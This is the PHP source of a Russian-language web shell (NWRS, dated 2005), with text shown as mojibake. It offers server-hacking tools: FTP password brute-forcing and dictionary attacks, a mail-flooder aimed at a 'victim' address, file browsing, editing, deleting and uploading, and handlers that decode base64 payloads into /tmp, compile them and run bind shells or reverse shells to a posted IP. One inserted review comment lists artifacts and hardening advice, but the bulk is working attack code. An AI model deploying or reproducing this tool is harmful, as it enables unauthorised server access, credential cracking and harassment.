";} if (file_get_contents("/etc/httpd.conf")) {echo "Êîíôèãóðàöèÿ Apache (httpd.conf)
";} if (file_get_contents("/etc/httpd.conf")) {echo "cpanel log
";} break; // Î ñêðèïòå case "about": echo "
Ïðèâåò âñåì!

Íàêîíåö-òî NWRS äîñòóïåí â ïåðâîé ñòàáèëüíîé âåðñèè! Äîáàâèëîñü ìíîæåñòâî íîâûõ ïîëåçíûõ âîçìîæíîñòåé. Âñå ôóíêöèè ñêðèïòà ðàáîòàþò è ðàáîòàþò êîððåêòíî. Äîáàâëåíû óíèêàëüíûå èíñòðóìåíòû äëÿ âçëîìà ñåðâåðà.  òî æå âðåìÿ íåò íè÷åãî ëèøíåãî. Âñå, ÷òî çàäóìûâàëîñü - ðåàëèçèðîâàíî. Äóìàþ, êàæäûé íàéäåò â ñêðèïòå ÷òî-òî ïîëåçíîå äëÿ ñåáÿ. Òàêæå çàÿâëÿþ î òîì, ÷òî ÿ çàêðûâàþ ïðîåêò, èáî îí äîñòèã èäåàëà :) Ëþáîé ìîæåò åãî ïðîäîëæèòü, php - îòêðûòûé ÿçûê. Íà ïåðâûõ ïîðàõ ñêðèïò âîîáùå áûë òîëüêî ó íåñêîëüêèõ ÷åëîâåê óçêîãî êðóãà äðóçåé, ïèñàë åãî äëÿ ñåáÿ, èç-çà ñâîåé ïðèðîäíîé ëåíè. Íó, è ñïàñèáî ýòèì ëþäÿì: Nitrex, Terabyte, 1dt_wolf, xoce, FUF, Shift, dodbob, m0zg, Tristram, Sanchous (îðôîãðàôèÿ è äèçàéí)... È ìíîãèì äðóãèì... Èõ èäåè î÷åíü ïîìîãëè âîïëîòèòü â æèçíü ñòîëü óíèâåðñàëüíûé èíñòðóìåíò. Îãðîìíîå ñïàñèáî èì!

Ïîìíèòå: èñïîëüçóÿ ýòîò ñêðèïò íà ÷óæèõ ñåðâåðàõ, âû íàðóøàåòå çàêîí :) Òàê ÷òî îñòîðîæíåå.
"; echo "


Ïîñåòèòå ýòè ñàéòû, è âû âñåãäà áóäåòå â êóðñå ñîáûòèé:

www.ru24-team.net

www.web-hack.ru

www.rst.void.ru

www.hackru.info

www.realcoding.net

www.ccteam.ru

Èçâèíÿþñü, åñëè êîãî çàáûë.
Àâòîð íå íåñåò îòâåòñòâåííîñòè çà ìàòåðèàëû, ðàçìåùåííûå íà ýòèõ ñàéòàõ, îcîáåííî íà ïîñëåäíåì :)




Ñêðèïò ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè GNU GPL
22 Èþëÿ 2005 ã. © DreAmeRz
e-mail:
dreamerz@mail.ru ICQ: 817312 WEB: http://www.Ru24-Team.NET"; break; // ÔÒÏ ïîäáîð ïàðîëåé case "ftppass": $filename="/etc/passwd"; // passwd file $ftp_server="localhost"; // FTP-server echo "FTP-server: $ftp_server

"; $fp = fopen ($filename, "r"); if ($fp) { while (!feof ($fp)) { $buf = fgets($fp, 100); ereg("^([0-9a-zA-Z]{1,})\:",$buf,$g); $ftp_user_name=$g[1]; $ftp_user_pass=$g[1]; $conn_id=ftp_connect($ftp_server); $login_result=@ftp_login($conn_id, $ftp_user_name, $ftp_user_pass); if (($conn_id) && ($login_result)) { echo "Ïîäêëþ÷åíèå login:password - ".$ftp_user_name.":".$ftp_user_name."
"; ftp_close($conn_id);} else { echo $ftp_user_name." - error
"; } }} break; case "ftp": echo "
Ïðîâåðèòü íà ñâÿçêó login\password
  FTP Host:    
  Login:    
  Êîëëè÷åñòâî ïàðîëåé:     <1000 pass
  Ïàðîëü äëÿ ïðîâåðêè:    
Ëîã ñîõðàíÿåòñÿ â pass.txt
"; function s() { $word="qwrtypsdfghjklzxcvbnm"; return $word[mt_rand(0,strlen($word)-1)]; } function g() { $word="euioam"; return $word[mt_rand(0,strlen($word)-2)]; } function name0() { return s().g().s(); } function name1() { return s().g().s().g(); } function name2() { return s().g().g().s(); } function name3() { return s().s().g().s().g(); } function name4() { return g().s().g().s().g(); } function name5() { return g().g().s().g().s(); } function name6() { return g().s().s().g().s(); } function name7() { return s().g().g().s().g(); } function name8() { return s().g().s().g().g(); } function name9() { return s().g().s().g().s().g(); } function name10() { return s().g().s().s().g().s().s(); } function name11() { return s().g().s().s().g().s().s().g(); } $cool=array(1,2,3,4,5,6,7,8,9,10,99,100,111,111111,666,1978,1979,1980,1981,1982,1983,1984,1985,1986,1987,1988,1989,1990,1991,1992,1993,1994,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005); $cool2=array('q1w2e3','qwerty','qwerty111111','123456','1234567890','0987654321','asdfg','zxcvbnm','qazwsx','q1e3r4w2','q1r4e3w2','1q2w3e','1q3e2w','poiuytrewq','lkjhgfdsa','mnbvcxz','asdf','root','admin','admin123','lamer123','admin123456','administrator','administrator123','q1w2e3r4t5','root123','microsoft','muther','hacker','hackers','cracker'); function randword() { global $cool; $func="name".mt_rand(0,11); $func2="name".mt_rand(0,11); switch (mt_rand(0,11)) { case 0: return $func().mt_rand(5,99); case 1: return $func()."-".$func2(); case 2: return $func().$cool[mt_rand(0,count($cool)-1)]; case 3: return $func()."!".$func(); case 4: return randpass(mt_rand(5,12)); default: return $func(); } } function randpass($len) { $word="qwertyuiopasdfghjklzxcvbnm1234567890"; $s=""; for ($i=0; $i<$len; $i++) { $s.=$word[mt_rand(0,strlen($word)-1)]; } return $s; } if (@unlink("pass.txt") < 0){ echo "íè÷åãî íåò"; exit; } $file="pass.txt"; if($file && $host && $login){ $cn=mt_rand(30,30); for ($i=0; $i<$cn; $i++) { $s=$cool2[$i]; 
$f=@fopen(pass.".txt","a+"); fputs($f,"$s\n"); } $cnt2=mt_rand(43,43); for ($i=0; $i<$cnt2; $i++) { $r=$cool[$i]; $f=@fopen(pass.".txt","a+"); fputs($f,"$login$r\n"); } $p="$testing"; $f=@fopen(pass.".txt","a+"); fputs($f,"$p\n"); $cnt3=mt_rand($number,$number); for ($i=0; $i<$cnt3; $i++) { $u=randword(); $f=@fopen(pass.".txt","a+"); fputs($f,"$u\n"); } if(is_file($file)){ $passwd=file($file,1000); for($i=0; $i Ïîçäðàâëÿþ!!! Ïàðîëü ïîäîáðàí.
  Êîííåêò: $host
  Ëîãèí: $login
  Ïàðîëü: $password ";exit; } elseif(preg_match("/530/",$text)){ $stop=true; } } fclose($open_ftp); }else{ echo "
Íåâåðíî óêàçàí ftp õîñòèíãà!!! Íà $host çàêðûò 21 ïîðò!
";exit; } } } } break; // SQL Attack case "sql": break; // MailFlud case "mailfluder": $email=$_POST['email']; // Ìûëî æåðòâû $from=$_POST['from']; // Ìûëî æåðòâû $num=$_POST['num']; // ×èñëî ïèñåì $text=$_POST['text']; // Òåêñò ôëóäà $kb=$_POST['kb']; // Âåñ ïèñüìà (kb) ?> Æåðòâà: $email
Êîë-âî ïèñåì: $num
Îáùèé ïîñëàííûé îáúåì: $all_kb kb

EOF; } else { echo <<
Ìûëî æåðòâû
Îò ëèïîâîãî ìûëà
×èñëî ïèñåì
Òåêñò ôëóäà
Âåñ ïèñüìà (KB)
  
EOF; } break; case "tar": # àðõèâàöèÿ äèðåêòîðèè $fullpath = $d."/".$tar; /* çàäàåì ñëó÷àéíûå èìåíà ôàéëîâ àðõèâàöèè*/ $CHARS = "abcdefghijklmnopqrstuvwxyz"; for ($i=0; $i<6; $i++) $charsname .= $CHARS[rand(0,strlen($CHARS)-1)]; echo "
Êàòàëîã $fullpath ".exec("tar -zc $fullpath -f $charsname.tar.gz")."óïàêîâàí â ôàéë $charsname.tar.gz"; echo "
Àðõèâàöèÿ $name.tar.gz:
"; exec($archive); break; // Íàâèãàöèÿ case "navigation": // Ïîøëà íàâèãàöèÿ $mymenu = " [Ïðîñìîòð ] [Óäàëèòü] [Ðåäàêòèðîâàòü] [Î÷èñòèòü] [Çàìåíèòü òåêñò] [Çàãðóçèòü]
"; if(@$_GET['download']){ @$download=$_GET['download']; @$d=$_GET['d']; header("Content-disposition: attachment; filename=\"$download\";"); readfile("$d/$download"); exit;} $images=array(".gif",".jpg",".png",".bmp",".jpeg"); $whereme=getcwd(); @$d=@$_GET['d']; $copyr = "
"; $php_self=@$_SERVER['PHP_SELF']; if(@eregi("/",$whereme)){$os="unix";}else{$os="win";} if(!isset($d)){$d=$whereme;} $d=str_replace("\\","/",$d); $expl=explode("/",$d); $coun=count($expl); if($os=="unix"){echo "/";} else{ echo "$expl[0]/";} for($i=1; $i<$coun; $i++){ @$xx.=$expl[$i]."/"; $sls="$expl[$i]/"; $sls=str_replace("//","/",$sls); $sls=str_replace("/'>/","/'>",$sls); print $sls; } echo ""; //if($os=="unix"){ echo " //id: ".@exec('id')." //uname -a: ".@exec('uname -a')."";} if(@$_GET['delfl']){ @$delfolder=$_GET['delfolder']; echo "DELETE FOLDER: ".@$_GET['delfolder']."
(All files must be writable)
Yes || No

"; exit; } if(@$_GET['deldir']){ @$dir=$_GET['dir']; function deldir($dir) { $handle = @opendir($dir); while (false!==($ff = @readdir($handle))){ if($ff != "." && $ff != ".."){ if(@is_dir("$dir/$ff")){ deldir("$dir/$ff"); }else{ @unlink("$dir/$ff"); }}} @closedir($handle); if(@rmdir($dir)){ @$success = true;} return @$success; } $dir=@$dir; deldir($dir); $rback=$_GET['rback']; @$rback=explode("/",$rback); $crb=count($rback); for($i=0; $i<$crb-1; $i++){ @$x.=$rback[$i]."/"; } echo ""; echo $copyr; exit;} if(@$_GET['replace']=="1"){ $ip=@$_SERVER['REMOTE_ADDR']; $d=$_GET['d']; $e=$_GET['e']; @$de=$d."/".$e; $de=str_replace("//","/",$de); $e=@$e; echo $mymenu ; echo " Ñðåäñòâî çàìåíû:
(òû ìîæåøü çàìåíèòü ëþáîé òåêñò)
Ôàéë: $de
1. Òâîé IP
2. IP microsoft.com :)
Çàìåíÿòü ýòî ýòèì
"; if(@$_POST['doit']){ $filename="$d/$e"; $fd = @fopen ($filename, "r"); $rpl = @fread ($fd, @filesize ($filename)); $re=str_replace("$this","$bythis",$rpl); $x=@fopen("$d/$e","w"); @fwrite($x,"$re"); echo "
$this çàìåíåíî íà $bythis
[Ïîñìîòðåòü ôàéë]


"; } echo $copyr; exit;} if(@$_GET['yes']=="yes"){ $d=@$_GET['d']; $e=@$_GET['e']; unlink($d."/".$e); $delresult="$d/$e óäàëåí! "; } if(@$_GET['clean']=="1"){ @$e=$_GET['e']; $x=fopen("$d/$e","w"); fwrite($x,""); echo ""; exit; } if(@$_GET['e']){ $d=@$_GET['d']; $e=@$_GET['e']; $pinf=pathinfo($e); if(in_array(".".@$pinf['extension'],$images)){ echo ""; exit;} $filename="$d/$e"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$e; $de=str_replace("//","/",$de); if(is_file($de)){ if(!is_writable($de)){echo "
ÒÎËÜÊÎ ×ÒÅÍÈÅ

";}} echo $mymenu ; echo " Ñîäåðæèìîå ôàéëà:
$de
$c

"; if(@$_GET['delete']=="1"){ $delete=$_GET['delete']; echo " Óäàëåíèå: òû óâåðåí?
Äà || Íåò
"; if(@$_GET['yes']=="yes"){ @$d=$_GET['d']; @$e=$_GET['e']; echo $delresult; } if(@$_GET['no']){ echo " "; } } #end of delete echo $copyr; exit; } #end of e if(@$_GET['edit']=="1"){ @$d=$_GET['d']; @$ef=$_GET['ef']; if(is_file($d."/".$ef)){ if(!is_writable($d."/".$ef)){echo "
ÒÎËÜÊÎ ×ÒÅÍÈÅ

";}} echo $mymenu ; $filename="$d/$ef"; $fd = @fopen ($filename, "r"); $c = @fread ($fd, @filesize ($filename)); $c=htmlspecialchars($c); $de=$d."/".$ef; $de=str_replace("//","/",$de); echo " Ðåäàêòèðîâàíèå:
$de


"; if(@$_POST['save']){ $editf=@$_POST['editf']; $editf=stripslashes($editf); $f=fopen($filename,"w+"); fwrite($f,"$editf"); echo ""; exit; } echo $copyr; exit; } echo" "; $dirs=array(); $files=array(); $dh = @opendir($d) or die("
Íàçâàíèå
Òèï
Ðàçìåð
Âëàäåëåö/Ãðóïïà
Ïðàâà
Êàòàëîã íå ñóùåñòâóåò èëè äîñòóï ê íåìó çàïðåùåí!

$copyr
"); while (!(($file = readdir($dh)) === false)) { if ($file=="." || $file=="..") continue; if (@is_dir("$d/$file")) { $dirs[]=$file; }else{ $files[]=$file; } sort($dirs); sort($files); $fz=@filesize("$d/$file"); } function perm($perms){ if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } for($i=0; $i0 $linkd
DIR 
$owner/$group$info"; } for($i=0; $i2 $files[$i]
`$siz
$owner/$group$info"; } echo ""; echo $copyr; break; // Óñòàíîâêà áåêäîðà case "backconnect": echo "Óñòàíîâêà áåêäîðà / îòêðûòèå ïîðòà"; echo "
"; echo ""; echo "Îòêðûòü ïîðò "; echo " "; echo "Ïàðîëü äëÿ äîñòóïà "; echo " "; echo "Èñïîëüçîâàòü "; echo " "; echo ""; echo ""; echo ""; echo "
"; echo "Óñòàíîâêà áåêäîðà / connect-back"; echo "
"; echo ""; echo "IP-àäðåñ "; echo " "; echo "Ïîðò "; echo " "; echo "Èñïîëüçîâàòü "; echo " "; echo ""; echo ""; echo ""; echo "
";
// NOTE(review): the four handlers below share one pattern: a base64 payload
// variable is decoded to a fixed path under /tmp (opened in append mode "ab+"),
// the C variants are compiled with gcc, and the result is started in the
// background through exec(). Request values ($_POST port / bind_pass / ip) are
// concatenated into the command string without escaping.
// Host artifacts named here: /tmp/bd.c, /tmp/bd, /tmp/bdpl, /tmp/back,
// /tmp/back.c, /tmp/backc. Only the two .c sources are unlinked; the compiled
// binaries and the Perl scripts are left on disk.
// Detection and hardening: alert on gcc or perl started by the web-server
// account and on new files appearing at these /tmp paths; restrict the exec()
// family with php.ini disable_functions; mount /tmp noexec (not sufficient on
// its own, since two handlers run their payload through the perl interpreter);
// restrict listening ports and outbound connections for the web-server account.
/* port bind C */
// Selected when port and bind_pass are posted with use=C. $port_bind_bd_c is
// defined outside this span.
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) {
    // $err is only assigned when fopen() fails.
    $w_file=fopen("/tmp/bd.c","ab+") or $err=1;
    if($err==1) { echo "
ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/bd.c
"; $err=0; } else {
        fputs($w_file,base64_decode($port_bind_bd_c));
        fclose($w_file);
        $blah=exec("gcc -o /tmp/bd /tmp/bd.c");
        unlink("/tmp/bd.c");
        $bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &";
        $blah=exec($bind_string);
        // Overwrites the posted cmd value; presumably run by command-execution
        // code outside this span. TODO confirm.
        $_POST['cmd']="ps -aux | grep bd";
        $err=0;
    }
}
/* port bind Perl */
// Same trigger fields with use=Perl; the payload variable $port_bind_bd_pl is
// not visible in this span.
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) {
    $w_file=fopen("/tmp/bdpl","ab+") or $err=1;
    if($err==1) { echo "
ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/
"; $err=0; } else {
        fputs($w_file,base64_decode($port_bind_bd_pl));
        fclose($w_file);
        $bind_string="perl /tmp/bdpl ".$_POST['port']." &";
        $blah=exec($bind_string);
        $_POST['cmd']="ps -aux | grep bdpl";
        $err=0;
    }
}
/* back connect Perl */
// Selected when ip and port are posted with use=Perl; $back_connect is not
// visible in this span. The resulting process makes an outbound connection, so
// egress logs for the web-server account are the network-side evidence.
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) {
    $w_file=fopen("/tmp/back","ab+") or $err=1;
    if($err==1) { echo "
ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/
"; $err=0; } else {
        fputs($w_file,base64_decode($back_connect));
        fclose($w_file);
        $bc_string="perl /tmp/back ".$_POST['ip']." ".$_POST['port']." &";
        $blah=exec($bc_string);
        $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
        $err=0;
    }
}
/* back connect C */
// Selected when ip and port are posted with use=C; $back_connect_c is not
// visible in this span.
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) {
    $w_file=fopen("/tmp/back.c","ab+") or $err=1;
    if($err==1) { echo "
ÎØÈÁÊÀ! Íåâîçìîæíà çàïèñü â /tmp/back.c
"; $err=0; } else {
        fputs($w_file,base64_decode($back_connect_c));
        fclose($w_file);
        $blah=exec("gcc -o /tmp/backc /tmp/back.c");
        unlink("/tmp/back.c");
        $bc_string="/tmp/backc ".$_POST['ip']." ".$_POST['port']." &";
        $blah=exec($bc_string);
        $_POST['cmd']="echo \"Ñåé÷àñ ñêðèïò êîííåêòèòñÿ ê ".$_POST['ip']." port ".$_POST['port']." ...\"";
        $err=0;
    }
}
// The (possibly overwritten) cmd value is echoed back without HTML escaping.
echo "Âûïîëíåííàÿ êîìàíäà: ".$_POST['cmd'].""; echo ""; echo "
Ðåçóëüòàò: "; echo "
"; break; // Uploading case "upload": echo <<Çàãðóçêà ôàéëîâ * Çàãðóçèòü áîëüøîå êîëè÷åñòâî ôàéëîâ *


$tend HTML; if (isset($_POST['path'])){ $uploadfile = $_POST['path'].$_FILES['file']['name']; if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} if (copy($_FILES['file']['tmp_name'], $uploadfile)) { echo "Ôàéë óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n"; echo "Èìÿ:" .$_FILES['file']['name']. "\n"; echo "Ðàçìåð:" .$_FILES['file']['size']. "\n"; } else { print "Íå óäà¸òñÿ çàãðóçèòü ôàéë. Info:\n"; print_r($_FILES); } } echo "Çàãðóçêà ôàéëîâ ñ óäàëåííîãî êîìïüþòåðà:
HTTP-ïóòü ê ôàéëó:

Íàçâàíèå ôàéëà èëè ïóòü ñ íàçâàíèåì ôàéëà:

"; $data = @implode("", file($file3)); $fp = @fopen($file2, "wb"); @fputs($fp, $data); $ok = @fclose($fp); if($ok) { $size = filesize($file2)/1024; $sizef = sprintf("%.2f", $size); print "
Âû çàãðóçèëè: ôàéë $file2 ðàçìåðîì (".$sizef."êÁ)
"; } else { print "
Îøèáêà çàãðóçêè ôàéëà
"; } break; // Tools case "tools": echo "Ãåíåðàöèÿ md5-øèôðà

"; @$md5=@$_POST['md5']; if(@$_POST['md5']){ echo "md5 ñãåíåðèðîâàí:
".md5($md5)."";} echo "
Êîäèðîâàíèå/äåêîäèðîâàíèå base64

"; if(@$_POST['base64']){ @$base64=$_POST['base64']; echo " Êîäèðîâàíî:

Äåêîäèðîâàíî:

";} echo "
DES-êîäèðîâàíèå:

"; if(@$_POST['des']){ @$des=@$_POST['des']; echo "DES ñãåíåðèðîâàí:
".crypt($des)."";} echo "
SHA1-êîäèðîâàíèå:

"; if(@$_POST['sha1']){ @$des=@$_POST['sha1']; echo "SHA1 ñãåíåðèðîâàí:
".sha1($sha1a)."";} echo ""; echo "html-êîä -> øåñòíàäöàòèðè÷íûå çíà÷åíèÿ
"; if (isset($_POST['data'])) { echo "

Ðåçóëüòàò:
"; $str=str_replace("%20","",$_POST['data']); for($i=0;$i











"; if(@$_POST['massupload']){ $where=@$_POST['where']; $uploadfile1 = "$where/".@$_FILES['text1']['name']; $uploadfile2 = "$where/".@$_FILES['text2']['name']; $uploadfile3 = "$where/".@$_FILES['text3']['name']; $uploadfile4 = "$where/".@$_FILES['text4']['name']; $uploadfile5 = "$where/".@$_FILES['text5']['name']; $uploadfile6 = "$where/".@$_FILES['text6']['name']; $uploadfile7 = "$where/".@$_FILES['text7']['name']; $uploadfile8 = "$where/".@$_FILES['text8']['name']; $uploadfile9 = "$where/".@$_FILES['text9']['name']; $uploadfile10 = "$where/".@$_FILES['text10']['name']; $uploadfile11 = "$where/".@$_FILES['text11']['name']; $uploadfile12 = "$where/".@$_FILES['text12']['name']; $uploadfile13 = "$where/".@$_FILES['text13']['name']; $uploadfile14 = "$where/".@$_FILES['text14']['name']; $uploadfile15 = "$where/".@$_FILES['text15']['name']; $uploadfile16 = "$where/".@$_FILES['text16']['name']; $uploadfile17 = "$where/".@$_FILES['text17']['name']; $uploadfile18 = "$where/".@$_FILES['text18']['name']; $uploadfile19 = "$where/".@$_FILES['text19']['name']; $uploadfile20 = "$where/".@$_FILES['text20']['name']; if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile1
";} if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile2
";} if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile3
";} if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile4
";} if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile5
";} if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile6
";} if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile7
";} if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile8
";} if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile9
";} if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile10
";} if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile11
";} if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile12
";} if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile13
";} if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile14
";} if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile15
";} if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile16
";} if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile17
";} if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile18
";} if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile19
";} if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) { $where=str_replace("\\\\","\\",$where); echo "Çàãðóæåíî: $uploadfile20
";} } exit; break; case "selfremover": print "
Ôàéë:
Ïàïêà:
"; print "
Òû óâåðåí, ÷òî õî÷åøü óäàëèòü ýòîò øåëë ñ ñåðâåðà?

Äà, õî÷ó | Íåò, ïóñòü åùå ïîáóäåò


Áóäåì óäàëÿòü "; $path=__FILE__; print $path; print "?
"; die; } if($p=="yes"){ $path=__FILE__; @unlink($path); $path=str_replace("\\","/",$path); if(file_exists($path)){$hmm="Ôàéë íåâîçìîæíî óäàëèòü!"; print "Ôàéë $path íå óäàëåí!"; }else{$hmm="Óäàëåí";} print ""; } break; ?>